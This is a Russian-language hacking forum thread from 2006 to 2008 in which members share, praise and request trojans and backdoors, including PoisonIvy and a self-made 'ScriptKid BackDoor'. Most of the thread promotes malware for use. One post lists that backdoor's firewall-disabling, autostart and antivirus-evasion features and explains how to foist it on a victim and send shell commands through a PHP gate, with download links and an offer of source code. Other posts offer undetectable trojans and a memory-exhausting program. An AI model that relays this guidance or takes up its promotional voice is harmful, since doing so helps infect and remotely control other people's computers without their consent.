| Viruses.. Do not open! | Хак! Ломать не строить - это уметь надо |
|
|
Версия для печати темы
Нажмите сюда для просмотра этой темы в оригинальном формате
Твой софтовый форум Хак! Ломать не строить - это уметь надо Viruses.. Do not open!
Автор: de1ay 18.07.2006 - 10:03
PoisonIvy 2.0
Меня трой порадовал 
Удобный, неглючный, с форумом поддержки
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
PS:Хотелось-бы выразить благодарность в поимке лошадки в интернете парню с ником One Second
Пароль:
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
Автор: Jon-dog 2.08.2006 - 11:02
Вот немного руссифицировал чтоб кто в англ плохо, понимали как сделать ехе
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
Автор: DemonRND 26.08.2006 - 19:46
Касперский его заметил... Обидно, а так класный тойанчик))
Автор: snike 28.08.2006 - 15:11
многофункциональный бэкдор под Win32-системы, работающий по
архитектуре "клиент-сервер", с помощью которого можно практически полностью контролировать
зараженную систему.
Возможности:
- Выполнять любые команды в системе через коммандный интерпретатор cmd.exe
- Работа с файловой системой через cmd.exe
- Запускать любые программы в системе
- Выводить свое сообщение
- Выключать/Перезагужать/Завершить сеанс зараженной машины
- Закрывать/Открывать CD-ROM
- Включать/Выключать монитор
- Устанавливать свои собственные обои
- Выставлять мышь на левшу/правшу
- Установка курсора в разные координаты (:
- Включать/Выключать Scroll Lock, Num Lock, Caps Lock на клавиатуре
- Прятать кнопку "ПУСК", панель со свернутыми окнами, Quick Launch, часы, трей и т.д
Фичи:
- Автозагрзука из под winlogon (Userinit).
- Вырубает встроенный Windows-файрвол (ICF/ICS и WSCSVC), который блокирует коннекты к машине
- Управление зараженной машиной через PHP-гейт. Теперь об анонимности можно беспокоиться в два раза меньше.
- Маленький размер сервера. Всего ~4,50 килобайт (паковал FSG, компилил LCC, так что возможно еще меньше).
- На момент релиза, ни один антивирус не определил троянский код.
Впариваем троян (/server/server.exe) ламеру. Затем заливаем на шелл скрипт управлением трояном (/web/gate.php).
На шелле должен быть установлен PHP и поддерживаться работа с сокетами. Узнаем IP-адрес ламера. Заходим на
скрипт:
http://shell/sbg.php?ipaddr=127.0.0.1&port=5745, где 127.0.0.1 - это IP-адрес жертвы. Затем вводим команды
в одно единственное поле.
----[ 0x02: команды
команды без аргументов:
hide_start / show_start
hide_rebar / show_rebar
hide_quicklaunch / show_quicklaunch
hide_tasksw / show_tasksw
hide_trey / show_trey
hide_treybutton / show_treybutton
hide_treyicon / show_treyicon
hide_time / show_time
mouse_on / mouse_off
mouse_swap_on / mouse_swap_off
numlock_on / numlock_off
capslock_on / capslock_off
scrolllock_on / scrolllock_off
keyboard_on / keyboard_off
monitor_on / monitor_off
cdrom_open / cdrom_close
logof / power / rboot / stand / sleep
about
beep
команды c аргументами:
cmd^комманда
messagebox^текст_сообщения^заголовок_сообщения
crazy_cdrom^кол-во_выдвигов/задвигов
crazy_mouse^частота_сдвигов(мл.сек)^кол-во_раз
Примеры ввода команд:
messagebox^Hacked by SN!KE=))^
cmd^dir
cmd^type C:\a.txt
Короче говоря ^ - разделитель.
_http://rapidshare.de/files/31054280/ScriptKid_BackDoor_v0.01_beta.rar
З.Ы. При желании могу выложить исходник.
Автор: snike 29.08.2006 - 22:19
Погляди на свой "Press any key to format C:"
_http://rapidshare.de/files/31227999/sr.rar
Исходники...
Автор: de1ay 20.09.2006 - 17:25
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
Автор: snike 23.09.2006 - 15:27
Какая версия Ксинча?
Автор: de1ay 25.09.2006 - 14:57
1.5 alfa 3
Автор: Jon-dog 6.12.2006 - 5:27
Трой не трой, и троем то не назвать, и вурусом, вобщем скрипт сброса (удаления) пароля на радмин при каждой перезагрузке компа! провернено на 2.1, 22
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
Автор: mabden 9.12.2006 - 9:50
Jon-dog не сможешь еще раз вылажить русик к PoisonIvy 2.0
Автор: betepon 9.12.2006 - 10:00
Линки :
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
не работают.
Автор: sharp 12.12.2006 - 13:22
Посмотрите тут, много чего есть
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
Автор: SYS 20.12.2006 - 14:41
Не один линк не работает (
Автор: Jon-dog 23.12.2006 - 22:45
Что именно?
Автор: rx700 14.01.2007 - 15:09
новая версия ядовитого плюща
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
Автор: rx700 19.01.2007 - 12:37
и недавно вышла еще новее версия
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
Автор: -=skyd@n=- 8.06.2007 - 11:45
Во... 
только что сам написал 
....
За 5-10 сек. забивает оперативу 1гб...
С начала всё выглядит нормально но потом... 
...
Винда пишет не достаточно оперативи тб. тц..
Назвал: WinRamKiller пока 1,0 БЕТА 
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
Пока не подчто не прикрытое позже будет копировать себя в Винду и запускатся прикаждой загрузке системы но уже скрыто...
Пока зацините вред...
Автор: KOder 21.06.2007 - 15:59
качнул несколько троев--мне понравились)) у меня есть непалящийся трой .кому надо могу скинуть
Автор: FcSM 9.07.2007 - 20:19
KOder,
Скинь мне ПЛИЗ!!!
Автор: Fritz 13.07.2007 - 0:52
а где ScriptKid_BackDoor_v0.01_beta.rar?!! ссылка битая выложите кто нить!!!
Автор: Samdean 22.07.2007 - 19:34
вот держи.
http://www.rostdon.org/index.php?act=Attach&type=post&id=30
Автор: Fritz 1.08.2007 - 21:17
слишком паливный... дядбка avast его рассекретил ((
Автор: Штуцер 7.08.2007 - 18:30
По необходимости залез на ломалка.ру, и ес-но набросились вири. Мой нод вроде как отгавкался, но по крайней мере одну гадость я ему сам помог пропустить. Вот файлик запакованый, не могу разобраться что это. Кому интересно, можете посмотреть, нод ничего в нем не находит, а других антивирей я не ставил. А если смотреть неохота (что, в прочем, понятно), то посоветуйте где его можно проверить в сети.
Автор: de1ay 7.08.2007 - 18:40
На что проверить?
Автор: Jroslav2 7.08.2007 - 18:41
аваст ругнулся, это в сеть лезет...
Автор: de1ay 7.08.2007 - 18:48
Штуцер,
Если файл записывает себя в эту ветку реестра, то явно не из добрых побуждений.
Автор: Штуцер 7.08.2007 - 18:50
Оно 2х ядрёный проц на 100% грузит, я его убил - система вроде как работает. Так интересно же, что это такое - там, вирус, троян... И чего с ним делать, чтоб вреда небыло больше.
В реестре в ранах его вроде нету... В автозагрузке тоже. У меня виста, где еще может прописаться?
Автор: de1ay 7.08.2007 - 19:03
Автор: Штуцер 7.08.2007 - 19:19
Значит, трояка. Я так и думал, шумный он какой-то - проц грузит, и винты шуршат. Явно роется, пративный. А где проверял-то, delay(0)?
Автор: de1ay 7.08.2007 - 19:34
_virustotal.com
Автор: de1ay 16.10.2007 - 18:54
Poison Ivy 2.3.0 (latest version)
| У Вас нет прав для просмотра этого текста, пожалуйста, зарегистрируйтесь |
Автор: Inmate 4.04.2008 - 18:24
Оно 2х ядрёный проц на 100% грузит, я его убил - система вроде как работает. Так интересно же, что это такое - там, вирус, троян... И чего с ним делать, чтоб вреда небыло больше.
В реестре в ранах его вроде нету... В автозагрузке тоже. У меня виста, где еще может прописаться?
.
У меня такая же проблемка,может подскажите что делать?Проверял Нодом,Clam AV,AVZ никто еичего не находит!
Автор: THORVALD 4.04.2008 - 20:02
Портэйбл касперским по пробуй